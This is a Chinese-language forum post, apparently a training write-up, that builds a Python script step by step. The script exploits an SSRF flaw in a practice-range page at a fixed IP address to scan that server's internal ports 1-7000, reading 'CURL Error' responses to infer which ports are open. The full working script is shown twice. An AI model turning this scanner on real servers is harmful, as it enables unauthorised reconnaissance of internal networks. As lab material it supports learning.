SSRF靶场 python脚本编写
根据url传参写个脚本
先导入requests模块
import requests
用来对网页进行访问
构造 pd() 函数,用于判断端口是否开放
根据页面内容可得知
如果返回值中包含
“CURL Error:Failed connect to 127.0.0.1:1; Connection refused”
这串字符
则为端口不存在
那么我们需要用到正则表达式
那么导入re模块
import re
那么构造函数
判断一个字符串对象是否存在
“CURL Error”
存在返回Flase
不存在返回True
def pd(string):
'''
string: 用于判断的文本内容
'''
valid = re.search("(CURL Error:Failed connect to)", string)
if valid:
return False
return True
再构造访问函数
reponse()
用来请求页面并接受返回值
def reponse(port):
url = f'http://59.63.200.79:8019/index.php?url=http%3A%2F%2F127.0.0.1%3A{port}'
res = requests.get(url)
if pd(res.text):
print(f"[+] {port} Open")
然后构建启动函数
判断 1-7000端口
哪些开放
def main():
for i in range(1, 7000):
reponse(i)
运行
if __name__ == '__main__':
main()
发现还是很OK的
完整代码
import requests
import re
def pd(string):
valid = re.search("(CURL Error:Failed connect to)", string)
if valid:
return False
return True
def reponse(port):
url = f'http://59.63.200.79:8019/index.php?url=http%3A%2F%2F127.0.0.1%3A{port}'
res = requests.get(url)
if pd(res.text):
print(f"[+] {port} Open")
def main():
for i in range(1, 7000):
reponse(i)
if __name__ == '__main__':
main()
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-聂风 | 15.00 | 0 | 2021-08-14 16:04:33 | 额外打赏 - 限时活动 |
| Track-聂风 | 30.00 | 0 | 2021-08-14 16:04:19 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
登录后才可发表内容
返回:技术文章投稿区
技术文章
spider
发表于 2021-8-18
不错不错
评论列表
加载数据中...
小酒
发表于 2021-8-23
我也学了python . 只是才刚刚进来.网络安全才学到了sql注入
评论列表
加载数据中...